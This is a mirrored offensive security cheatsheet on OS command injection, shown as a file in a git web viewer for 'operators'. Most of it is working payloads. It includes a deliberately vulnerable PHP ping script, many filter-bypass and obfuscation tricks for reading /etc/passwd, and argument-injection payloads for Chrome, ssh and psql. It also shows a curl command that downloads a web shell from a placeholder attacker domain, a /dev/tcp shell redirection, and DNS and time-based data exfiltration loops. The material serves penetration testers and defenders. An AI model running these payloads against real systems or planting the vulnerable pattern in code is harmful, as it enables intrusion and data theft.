daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (16979B)


      1 ---
      2 title: "Command Injection"
      3 topic: "Command Injection"
      4 topicSlug: "command-injection"
      5 sourcePath: "Command Injection/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Command%20Injection/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Command Injection
     12 
     13 > Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Methodology](#methodology)
     19     * [Basic Commands](#basic-commands)
     20     * [Chaining Commands](#chaining-commands)
     21     * [Argument Injection](#argument-injection)
     22     * [Inside A Command](#inside-a-command)
     23 * [Filter Bypasses](#filter-bypasses)
     24     * [Bypass Without Space](#bypass-without-space)
     25     * [Bypass With A Line Return](#bypass-with-a-line-return)
     26     * [Bypass With Backslash Newline](#bypass-with-backslash-newline)
     27     * [Bypass With Tilde Expansion](#bypass-with-tilde-expansion)
     28     * [Bypass With Brace Expansion](#bypass-with-brace-expansion)
     29     * [Bypass Characters Filter](#bypass-characters-filter)
     30     * [Bypass Characters Filter Via Hex Encoding](#bypass-characters-filter-via-hex-encoding)
     31     * [Bypass With Single Quote](#bypass-with-single-quote)
     32     * [Bypass With Double Quote](#bypass-with-double-quote)
     33     * [Bypass With Backticks](#bypass-with-backticks)
     34     * [Bypass With Backslash And Slash](#bypass-with-backslash-and-slash)
     35     * [Bypass With $@](#bypass-with-)
     36     * [Bypass With $()](#bypass-with--1)
     37     * [Bypass With Variable Expansion](#bypass-with-variable-expansion)
     38     * [Bypass With Wildcards](#bypass-with-wildcards)
     39     * [Bypass With Random Case](#bypass-with-random-case)
     40 * [Data Exfiltration](#data-exfiltration)
     41     * [Time Based Data Exfiltration](#time-based-data-exfiltration)
     42     * [Dns Based Data Exfiltration](#dns-based-data-exfiltration)
     43 * [Polyglot Command Injection](#polyglot-command-injection)
     44 * [Tricks](#tricks)
     45     * [Backgrounding Long Running Commands](#backgrounding-long-running-commands)
     46     * [Remove Arguments After The Injection](#remove-arguments-after-the-injection)
     47 * [Labs](#labs)
     48     * [Challenge](#challenge)
     49 * [References](#references)
     50 
     51 ## Tools
     52 
     53 * [commixproject/commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool
     54 * [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library
     55 
     56 ## Methodology
     57 
     58 Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system.
     59 
     60 The danger of command injection is that it can allow an attacker to execute any command on the system, potentially leading to full system compromise.
     61 
     62 **Example of Command Injection with PHP**:
     63 Suppose you have a PHP script that takes a user input to ping a specified IP address or domain:
     64 
     65 ```php
     66 <?php
     67     $ip = $_GET['ip'];
     68     system("ping -c 4 " . $ip);
     69 ?>
     70 ```
     71 
     72 In the above code, the PHP script uses the `system()` function to execute the `ping` command with the IP address or domain provided by the user through the `ip` GET parameter.
     73 
     74 If an attacker provides input like `8.8.8.8; cat /etc/passwd`, the actual command that gets executed would be: `ping -c 4 8.8.8.8; cat /etc/passwd`.
     75 
     76 This means the system would first `ping 8.8.8.8` and then execute the `cat /etc/passwd` command, which would display the contents of the `/etc/passwd` file, potentially revealing sensitive information.
     77 
     78 ### Basic Commands
     79 
     80 Execute the command and voila :p
     81 
     82 ```powershell
     83 cat /etc/passwd
     84 root:x:0:0:root:/root:/bin/bash
     85 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
     86 bin:x:2:2:bin:/bin:/bin/sh
     87 sys:x:3:3:sys:/dev:/bin/sh
     88 ...
     89 ```
     90 
     91 ### Chaining Commands
     92 
     93 In many command-line interfaces, especially Unix-like systems, there are several characters that can be used to chain or manipulate commands.
     94 
     95 * `;` (Semicolon): Allows you to execute multiple commands sequentially.
     96 * `&&` (AND): Execute the second command only if the first command succeeds (returns a zero exit status).
     97 * `||` (OR): Execute the second command only if the first command fails (returns a non-zero exit status).
     98 * `&` (Background): Execute the command in the background, allowing the user to continue using the shell.
     99 * `|` (Pipe):  Takes the output of the first command and uses it as the input for the second command.
    100 
    101 ```powershell
    102 command1; command2   # Execute command1 and then command2
    103 command1 && command2 # Execute command2 only if command1 succeeds
    104 command1 || command2 # Execute command2 only if command1 fails
    105 command1 & command2  # Execute command1 in the background
    106 command1 | command2  # Pipe the output of command1 into command2
    107 ```
    108 
    109 ### Argument Injection
    110 
    111 Gain a command execution when you can only append arguments to an existing command.
    112 Use this website [Argument Injection Vectors - Sonar](https://sonarsource.github.io/argument-injection-vectors/) to find the argument to inject to gain command execution.
    113 
    114 * Chrome
    115 
    116     ```ps1
    117     chrome '--gpu-launcher="id>/tmp/foo"'
    118     ```
    119 
    120 * SSH
    121 
    122     ```ps1
    123     ssh '-oProxyCommand="touch /tmp/foo"' foo@foo
    124     ```
    125 
    126 * psql
    127 
    128     ```ps1
    129     psql -o'|id>/tmp/foo'
    130     ```
    131 
    132 Argument injection can be abused using the [worstfit](https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/) technique.
    133 
    134 In the following example, the payload `" --use-askpass=calc "` is using **fullwidth double quotes** (U+FF02) instead of the **regular double quotes** (U+0022)
    135 
    136 ```php
    137 $url = "https://example.tld/" . $_GET['path'] . ".txt";
    138 system("wget.exe -q " . escapeshellarg($url));
    139 ```
    140 
    141 Sometimes, direct command execution from the injection might not be possible, but you may be able to redirect the flow into a specific file, enabling you to deploy a web shell.
    142 
    143 * curl
    144 
    145     ```ps1
    146     # -o, --output <file>        Write to file instead of stdout
    147     curl http://[ATTACKER.DOMAIN.TLD]/ -o webshell.php
    148     ```
    149 
    150 ### Inside A Command
    151 
    152 * Command injection using backticks.
    153 
    154   ```bash
    155   original_cmd_by_server `cat /etc/passwd`
    156   ```
    157 
    158 * Command injection using substitution
    159 
    160   ```bash
    161   original_cmd_by_server $(cat /etc/passwd)
    162   ```
    163 
    164 ## Filter Bypasses
    165 
    166 ### Bypass Without Space
    167 
    168 * `$IFS` is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret `$IFS` as a space. `$IFS` does not directly work as a separator in commands like `ls`, `wget`; use `${IFS}` instead.
    169 
    170   ```powershell
    171   cat${IFS}/etc/passwd
    172   ls${IFS}-la
    173   ```
    174 
    175 * In some shells, brace expansion generates arbitrary strings. When executed, the shell will treat the items inside the braces as separate commands or arguments.
    176 
    177   ```powershell
    178   {cat,/etc/passwd}
    179   ```
    180 
    181 * Input redirection. The < character tells the shell to read the contents of the file specified.
    182 
    183   ```powershell
    184   cat</etc/passwd
    185   sh</dev/tcp/127.0.0.1/4242
    186   ```
    187 
    188 * ANSI-C Quoting
    189 
    190   ```powershell
    191   X=$'uname\x20-a'&&$X
    192   ```
    193 
    194 * The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value `09`.
    195 
    196   ```powershell
    197   ;ls%09-al%09/home
    198   ```
    199 
    200 * In Windows, `%VARIABLE:~start,length%` is a syntax used for substring operations on environment variables.
    201 
    202   ```powershell
    203   ping%CommonProgramFiles:~10,-18%127.0.0.1
    204   ping%PROGRAMFILES:~10,-5%127.0.0.1
    205   ```
    206 
    207 ### Bypass With A Line Return
    208 
    209 Commands can also be run in sequence with newlines
    210 
    211 ```bash
    212 original_cmd_by_server
    213 ls
    214 ```
    215 
    216 ### Bypass With Backslash Newline
    217 
    218 * Commands can be broken into parts by using backslash followed by a newline
    219 
    220   ```powershell
    221   $ cat /et\
    222   c/pa\
    223   sswd
    224   ```
    225 
    226 * URL encoded form would look like this:
    227 
    228   ```powershell
    229   cat%20/et%5C%0Ac/pa%5C%0Asswd
    230   ```
    231 
    232 ### Bypass With Tilde Expansion
    233 
    234 ```powershell
    235 echo ~+
    236 echo ~-
    237 ```
    238 
    239 ### Bypass With Brace Expansion
    240 
    241 ```powershell
    242 {,ip,a}
    243 {,ifconfig}
    244 {,ifconfig,eth0}
    245 {l,-lh}s
    246 {,echo,#test}
    247 {,$"whoami",}
    248 {,/?s?/?i?/c?t,/e??/p??s??,}
    249 ```
    250 
    251 ### Bypass Characters Filter
    252 
    253 Commands execution without backslash and slash - linux bash
    254 
    255 ```powershell
    256 swissky@crashlab:~$ echo ${HOME:0:1}
    257 /
    258 
    259 swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
    260 root:x:0:0:root:/root:/bin/bash
    261 
    262 swissky@crashlab:~$ echo . | tr '!-0' '"-1'
    263 /
    264 
    265 swissky@crashlab:~$ tr '!-0' '"-1' <<< .
    266 /
    267 
    268 swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
    269 root:x:0:0:root:/root:/bin/bash
    270 ```
    271 
    272 ### Bypass Characters Filter Via Hex Encoding
    273 
    274 ```powershell
    275 swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
    276 /etc/passwd
    277 
    278 swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
    279 root:x:0:0:root:/root:/bin/bash
    280 
    281 swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
    282 root:x:0:0:root:/root:/bin/bash
    283 
    284 swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
    285 root:x:0:0:root:/root:/bin/bash
    286 
    287 swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
    288 /etc/passwd
    289 
    290 swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
    291 root:x:0:0:root:/root:/bin/bash
    292 
    293 swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
    294 /etc/passwd
    295 
    296 swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
    297 root:x:0:0:root:/root:/bin/bash
    298 ```
    299 
    300 ### Bypass With Single Quote
    301 
    302 ```powershell
    303 w'h'o'am'i
    304 wh''oami
    305 'w'hoami
    306 ```
    307 
    308 ### Bypass With Double Quote
    309 
    310 ```powershell
    311 w"h"o"am"i
    312 wh""oami
    313 "wh"oami
    314 ```
    315 
    316 ### Bypass With Backticks
    317 
    318 ```powershell
    319 wh``oami
    320 ```
    321 
    322 ### Bypass With Backslash and Slash
    323 
    324 ```powershell
    325 w\ho\am\i
    326 /\b\i\n/////s\h
    327 ```
    328 
    329 ### Bypass With $@
    330 
    331 `$0`: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, `$0` will typically give the name of the shell.
    332 
    333 ```powershell
    334 who$@ami
    335 echo whoami|$0
    336 ```
    337 
    338 ### Bypass With $()
    339 
    340 ```powershell
    341 who$()ami
    342 who$(echo am)i
    343 who`echo am`i
    344 ```
    345 
    346 ### Bypass With Variable Expansion
    347 
    348 ```powershell
    349 /???/??t /???/p??s??
    350 
    351 test=/ehhh/hmtc/pahhh/hmsswd
    352 cat ${test//hhh\/hm/}
    353 cat ${test//hh??hm/}
    354 ```
    355 
    356 ### Bypass With Wildcards
    357 
    358 ```powershell
    359 powershell C:\*\*2\n??e*d.*? # notepad
    360 @^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
    361 ```
    362 
    363 ### Bypass With Random Case
    364 
    365 Windows does not distinguish between uppercase and lowercase letters when interpreting commands or file paths. For example, `DIR`, `dir`, or `DiR` will all execute the same `dir` command.
    366 
    367 ```powershell
    368 wHoAmi
    369 ```
    370 
    371 ## Data Exfiltration
    372 
    373 ### Time Based Data Exfiltration
    374 
    375 Extracting data char by char and detect the correct value based on the delay.
    376 
    377 * Correct value: wait 5 seconds
    378 
    379   ```powershell
    380   swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
    381   real    0m5.007s
    382   user    0m0.000s
    383   sys 0m0.000s
    384   ```
    385 
    386 * Incorrect value: no delay
    387 
    388   ```powershell
    389   swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
    390   real    0m0.002s
    391   user    0m0.000s
    392   sys 0m0.000s
    393   ```
    394 
    395 ### Dns Based Data Exfiltration
    396 
    397 Based on the tool from [HoLyVieR/dnsbin](https://github.com/HoLyVieR/dnsbin), also hosted at [dnsbin.zhack.ca](http://dnsbin.zhack.ca/)
    398 
    399 1. Go to [dnsbin.zhack.ca](http://dnsbin.zhack.ca)
    400 2. Execute a simple 'ls'
    401 
    402   ```powershell
    403   for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
    404   ```
    405 
    406 Online tools to check for DNS based data exfiltration:
    407 
    408 * [dnsbin.zhack.ca](http://dnsbin.zhack.ca)
    409 * [app.interactsh.com](https://app.interactsh.com)
    410 * [portswigger.net](https://portswigger.net/burp/documentation/collaborator)
    411 
    412 ## Polyglot Command Injection
    413 
    414 A polyglot is a piece of code that is valid and executable in multiple programming languages or environments simultaneously. When we talk about "polyglot command injection," we're referring to an injection payload that can be executed in multiple contexts or environments.
    415 
    416 * Example 1:
    417 
    418   ```powershell
    419   Payload: 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
    420 
    421   # Context inside commands with single and double quote:
    422   echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
    423   echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
    424   echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
    425   ```
    426 
    427 * Example 2:
    428 
    429   ```powershell
    430   Payload: /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
    431 
    432   # Context inside commands with single and double quote:
    433   echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
    434   echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
    435   echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
    436   ```
    437 
    438 ## Tricks
    439 
    440 ### Backgrounding Long Running Commands
    441 
    442 In some instances, you might have a long running command that gets killed by the process injecting it timing out.
    443 Using `nohup`, you can keep the process running after the parent process exits.
    444 
    445 ```bash
    446 nohup sleep 120 > /dev/null &
    447 ```
    448 
    449 ### Remove Arguments After The Injection
    450 
    451 In Unix-like command-line interfaces, the `--` symbol is used to signify the end of command options. After `--`, all arguments are treated as filenames and arguments, and not as options.
    452 
    453 ## Labs
    454 
    455 * [PortSwigger - OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
    456 * [PortSwigger - Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
    457 * [PortSwigger - Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
    458 * [PortSwigger - Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
    459 * [PortSwigger - Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
    460 * [Root Me - PHP - Command injection](https://www.root-me.org/en/Challenges/Web-Server/PHP-Command-injection)
    461 * [Root Me - Command injection - Filter bypass](https://www.root-me.org/en/Challenges/Web-Server/Command-injection-Filter-bypass)
    462 * [Root Me - PHP - assert()](https://www.root-me.org/en/Challenges/Web-Server/PHP-assert)
    463 * [Root Me - PHP - preg_replace()](https://www.root-me.org/en/Challenges/Web-Server/PHP-preg_replace)
    464 
    465 ### Challenge
    466 
    467 Challenge based on the previous tricks, what does the following command do:
    468 
    469 ```powershell
    470 g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
    471 ```
    472 
    473 **NOTE**: The command is safe to run, but you should not trust me.
    474 
    475 ## References
    476 
    477 * [Argument Injection and Getting Past Shellwords.escape - Etienne Stalmans - November 24, 2019](https://web.archive.org/web/20250306133700/https://staaldraad.github.io/post/2019-11-24-argument-injection/)
    478 * [Argument Injection Vectors - SonarSource - February 21, 2023](https://web.archive.org/web/20251211212046/https://sonarsource.github.io/argument-injection-vectors/)
    479 * [Back to the Future: Unix Wildcards Gone Wild - Leon Juranic - June 25, 2014](https://web.archive.org/web/20140714140437/http://www.exploit-db.com/papers/33930)
    480 * [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://web.archive.org/web/20241202133053/https://twitter.com/DissectMalware/status/1025604382644232192)
    481 * [Bug Bounty Survey - Windows RCE Spaceless - Bug Bounties Survey - May 4, 2017](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
    482 * [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://web.archive.org/web/20220428000241/https://twitter.com/asdizzle_/status/895244943526170628)
    483 * [OS Command Injection - PortSwigger - March 30, 2019](https://web.archive.org/web/20190330193912/https://portswigger.net/web-security/os-command-injection)
    484 * [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://web.archive.org/web/20250108174818/https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
    485 * [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - Kacper Szurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
    486 * [WorstFit: Unveiling Hidden Transformers in Windows ANSI! - Orange Tsai - January 10, 2025](https://web.archive.org/web/20250109163006/https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/)